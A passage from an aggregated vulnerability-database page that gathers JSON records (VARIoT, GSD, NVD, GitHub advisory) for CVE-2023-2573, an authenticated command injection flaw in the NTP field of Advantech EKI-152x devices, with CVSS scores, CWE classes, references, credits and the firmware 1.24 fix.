        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2023-2573",
        "trust": 3.4
      },
      {
        "db": "PACKETSTORM",
        "id": "172307",
        "trust": 2.5
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-009953",
        "trust": 0.8
      },
      {
        "db": "CXSECURITY",
        "id": "WLB-2023050038",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202305-383",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2023-2573",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2023-2573"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-009953"
      },
      {
        "db": "PACKETSTORM",
        "id": "172307"
      },
      {
        "db": "NVD",
        "id": "CVE-2023-2573"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202305-383"
      }
    ]
  },
  "id": "VAR-202305-0371",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 1.0
  },
  "last_update_date": "2023-12-18T11:54:15.800000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Advantech Fixes for command injection vulnerabilities",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=237365"
      }
    ],
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202305-383"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-77",
        "trust": 1.0
      },
      {
        "problemtype": "Command injection (CWE-77) [NVD evaluation ]",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-009953"
      },
      {
        "db": "NVD",
        "id": "CVE-2023-2573"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.5,
        "url": "https://www.advantech.com/en/support/details/firmware?id=1-1j9bed3"
      },
      {
        "trust": 2.5,
        "url": "https://www.advantech.com/en/support/details/firmware?id=1-1j9bect"
      },
      {
        "trust": 2.5,
        "url": "https://www.advantech.com/en/support/details/firmware?id=1-1j9bebl"
      },
      {
        "trust": 2.4,
        "url": "http://packetstormsecurity.com/files/172307/advantech-eki-15xx-series-command-injection-buffer-overflow.html"
      },
      {
        "trust": 2.4,
        "url": "http://seclists.org/fulldisclosure/2023/may/4"
      },
      {
        "trust": 2.4,
        "url": "https://cyberdanube.com/en/multiple-vulnerabilities-in-advantech-eki-15xx-series/"
      },
      {
        "trust": 0.9,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-2573"
      },
      {
        "trust": 0.6,
        "url": "https://cxsecurity.com/issue/wlb-2023050038"
      },
      {
        "trust": 0.6,
        "url": "https://cxsecurity.com/cveshow/cve-2023-2573/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-2575"
      },
      {
        "trust": 0.1,
        "url": "http://172.16.0.100/cgi-bin/index.cgi"
      },
      {
        "trust": 0.1,
        "url": "http://172.16.0.97"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-2574"
      },
      {
        "trust": 0.1,
        "url": "https://www.advantech.com/en/about"
      },
      {
        "trust": 0.1,
        "url": "https://advantech.com"
      },
      {
        "trust": 0.1,
        "url": "https://medusa.cyberdanube.com)."
      },
      {
        "trust": 0.1,
        "url": "https://twitter.com/cyberdanube"
      },
      {
        "trust": 0.1,
        "url": "http://172.16.0.100"
      },
      {
        "trust": 0.1,
        "url": "https://www.cyberdanube.com"
      },
      {
        "trust": 0.1,
        "url": "http://172.16.0.97/cgi-bin/index.cgi"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2023-2573"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-009953"
      },
      {
        "db": "PACKETSTORM",
        "id": "172307"
      },
      {
        "db": "NVD",
        "id": "CVE-2023-2573"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202305-383"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULMON",
        "id": "CVE-2023-2573"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-009953"
      },
      {
        "db": "PACKETSTORM",
        "id": "172307"
      },
      {
        "db": "NVD",
        "id": "CVE-2023-2573"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202305-383"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2023-05-08T00:00:00",
        "db": "VULMON",
        "id": "CVE-2023-2573"
      },
      {
        "date": "2023-12-07T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2023-009953"
      },
      {
        "date": "2023-05-12T16:24:23",
        "db": "PACKETSTORM",
        "id": "172307"
      },
      {
        "date": "2023-05-08T13:15:09.710000",
        "db": "NVD",
        "id": "CVE-2023-2573"
      },
      {
        "date": "2023-05-08T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202305-383"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2023-05-08T00:00:00",
        "db": "VULMON",
        "id": "CVE-2023-2573"
      },
      {
        "date": "2023-12-07T04:51:00",
        "db": "JVNDB",
        "id": "JVNDB-2023-009953"
      },
      {
        "date": "2023-05-12T18:15:09.617000",
        "db": "NVD",
        "id": "CVE-2023-2573"
      },
      {
        "date": "2023-05-15T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202305-383"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202305-383"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Command injection vulnerability in multiple Advantech products",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-009953"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "command injection",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202305-383"
      }
    ],
    "trust": 0.6
  }
}

GSD-2023-2573

Vulnerability from gsd - Updated: 2023-12-13 01:20

Details

Aliases

CVE-2023-2573

Aliases

CVE-2023-2573

JSON

To clipboard

{
  "GSD": {
    "alias": "CVE-2023-2573",
    "id": "GSD-2023-2573"
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2023-2573"
      ],
      "details": "Advantech EKI-1524, EKI-1522, EKI-1521 devices through 1.21 are affected by an command injection vulnerability in the NTP server input field, which can be triggered by authenticated users via a crafted POST request.\n\n\n\n",
      "id": "GSD-2023-2573",
      "modified": "2023-12-13T01:20:32.217502Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "office@cyberdanube.com",
        "ID": "CVE-2023-2573",
        "STATE": "PUBLIC"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "EKI-1524",
                    "version": {
                      "version_data": [
                        {
                          "version_affected": "\u003c=",
                          "version_name": "0",
                          "version_value": "1.21"
                        }
                      ]
                    }
                  },
                  {
                    "product_name": "EKI-1522",
                    "version": {
                      "version_data": [
                        {
                          "version_affected": "\u003c=",
                          "version_name": "0",
                          "version_value": "1.21"
                        }
                      ]
                    }
                  },
                  {
                    "product_name": "EKI-1521",
                    "version": {
                      "version_data": [
                        {
                          "version_affected": "\u003c=",
                          "version_name": "0",
                          "version_value": "1.21"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "Advantech"
            }
          ]
        }
      },
      "credits": [
        {
          "lang": "en",
          "value": "S. Dietz (CyberDanube)"
        },
        {
          "lang": "en",
          "value": "T. Weber (CyberDanube)"
        }
      ],
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "Advantech EKI-1524, EKI-1522, EKI-1521 devices through 1.21 are affected by an command injection vulnerability in the NTP server input field, which can be triggered by authenticated users via a crafted POST request.\n\n\n\n"
          }
        ]
      },
      "generator": {
        "engine": "Vulnogram 0.1.0-dev"
      },
      "impact": {
        "cvss": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        ]
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "cweId": "CWE-78",
                "lang": "eng",
                "value": "CWE-78 Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "https://www.advantech.com/en/support/details/firmware?id=1-1J9BED3",
            "refsource": "MISC",
            "url": "https://www.advantech.com/en/support/details/firmware?id=1-1J9BED3"
          },
          {
            "name": "https://www.advantech.com/en/support/details/firmware?id=1-1J9BEBL",
            "refsource": "MISC",
            "url": "https://www.advantech.com/en/support/details/firmware?id=1-1J9BEBL"
          },
          {
            "name": "https://www.advantech.com/en/support/details/firmware?id=1-1J9BECT",
            "refsource": "MISC",
            "url": "https://www.advantech.com/en/support/details/firmware?id=1-1J9BECT"
          },
          {
            "name": "https://cyberdanube.com/en/multiple-vulnerabilities-in-advantech-eki-15xx-series/",
            "refsource": "MISC",
            "url": "https://cyberdanube.com/en/multiple-vulnerabilities-in-advantech-eki-15xx-series/"
          },
          {
            "name": "http://seclists.org/fulldisclosure/2023/May/4",
            "refsource": "MISC",
            "url": "http://seclists.org/fulldisclosure/2023/May/4"
          },
          {
            "name": "http://packetstormsecurity.com/files/172307/Advantech-EKI-15XX-Series-Command-Injection-Buffer-Overflow.html",
            "refsource": "MISC",
            "url": "http://packetstormsecurity.com/files/172307/Advantech-EKI-15XX-Series-Command-Injection-Buffer-Overflow.html"
          }
        ]
      },
      "solution": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "Install firmware 1.24 to fix the issue."
            }
          ],
          "value": "Install firmware 1.24 to fix the issue."
        }
      ],
      "source": {
        "discovery": "EXTERNAL"
      }
    },
    "nvd.nist.gov": {
      "configurations": {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:advantech:eki-1521_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "1.21",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:advantech:eki-1521:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:advantech:eki-1522_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "1.21",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:advantech:eki-1522:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:advantech:eki-1524_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "1.21",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:advantech:eki-1524:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      },
      "cve": {
        "CVE_data_meta": {
          "ASSIGNER": "office@cyberdanube.com",
          "ID": "CVE-2023-2573"
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "en",
              "value": "Advantech EKI-1524, EKI-1522, EKI-1521 devices through 1.21 are affected by an command injection vulnerability in the NTP server input field, which can be triggered by authenticated users via a crafted POST request.\n\n\n\n"
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "en",
                  "value": "CWE-77"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.advantech.com/en/support/details/firmware?id=1-1J9BED3",
              "refsource": "MISC",
              "tags": [
                "Patch",
                "Product"
              ],
              "url": "https://www.advantech.com/en/support/details/firmware?id=1-1J9BED3"
            },
            {
              "name": "https://www.advantech.com/en/support/details/firmware?id=1-1J9BECT",
              "refsource": "MISC",
              "tags": [
                "Patch",
                "Product"
              ],
              "url": "https://www.advantech.com/en/support/details/firmware?id=1-1J9BECT"
            },
            {
              "name": "https://www.advantech.com/en/support/details/firmware?id=1-1J9BEBL",
              "refsource": "MISC",
              "tags": [
                "Patch",
                "Product"
              ],
              "url": "https://www.advantech.com/en/support/details/firmware?id=1-1J9BEBL"
            },
            {
              "name": "https://cyberdanube.com/en/multiple-vulnerabilities-in-advantech-eki-15xx-series/",
              "refsource": "MISC",
              "tags": [
                "Exploit",
                "Third Party Advisory"
              ],
              "url": "https://cyberdanube.com/en/multiple-vulnerabilities-in-advantech-eki-15xx-series/"
            },
            {
              "name": "http://seclists.org/fulldisclosure/2023/May/4",
              "refsource": "MISC",
              "tags": [
                "Exploit",
                "Third Party Advisory"
              ],
              "url": "http://seclists.org/fulldisclosure/2023/May/4"
            },
            {
              "name": "http://packetstormsecurity.com/files/172307/Advantech-EKI-15XX-Series-Command-Injection-Buffer-Overflow.html",
              "refsource": "MISC",
              "tags": [],
              "url": "http://packetstormsecurity.com/files/172307/Advantech-EKI-15XX-Series-Command-Injection-Buffer-Overflow.html"
            }
          ]
        }
      },
      "impact": {
        "baseMetricV3": {
          "cvssV3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.9
        }
      },
      "lastModifiedDate": "2023-05-12T18:15Z",
      "publishedDate": "2023-05-08T13:15Z"
    }
  }
}

GHSA-7CQG-75M4-9CVF

Vulnerability from github – Published: 2023-05-08 15:30 – Updated: 2025-02-13 18:31

Details

Severity ?

8.8 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [],
  "aliases": [
    "CVE-2023-2573"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-77",
      "CWE-78"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-05-08T13:15:09Z",
    "severity": "HIGH"
  },
  "details": "Advantech EKI-1524, EKI-1522, EKI-1521 devices through 1.21 are affected by an command injection vulnerability in the NTP server input field, which can be triggered by authenticated users via a crafted POST request.",
  "id": "GHSA-7cqg-75m4-9cvf",
  "modified": "2025-02-13T18:31:34Z",
  "published": "2023-05-08T15:30:18Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-2573"
    },
    {
      "type": "WEB",
      "url": "https://cyberdanube.com/en/multiple-vulnerabilities-in-advantech-eki-15xx-series"
    },
    {
      "type": "WEB",
      "url": "https://www.advantech.com/en/support/details/firmware?id=1-1J9BEBL"
    },
    {
      "type": "WEB",
      "url": "https://www.advantech.com/en/support/details/firmware?id=1-1J9BECT"
    },
    {
      "type": "WEB",
      "url": "https://www.advantech.com/en/support/details/firmware?id=1-1J9BED3"
    },
    {
      "type": "WEB",
      "url": "http://packetstormsecurity.com/files/172307/Advantech-EKI-15XX-Series-Command-Injection-Buffer-Overflow.html"
    },
    {
      "type": "WEB",
      "url": "http://seclists.org/fulldisclosure/2023/May/4"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2023-2573 (GCVE-0-2023-2573)

FKIE_CVE-2023-2573

VAR-202305-0371

Vendor description

Vulnerable versions

Vulnerability overview

Solution

Workaround

Recommendation

Contact Timeline

GSD-2023-2573

GHSA-7CQG-75M4-9CVF

Tags

Sightings

Nomenclature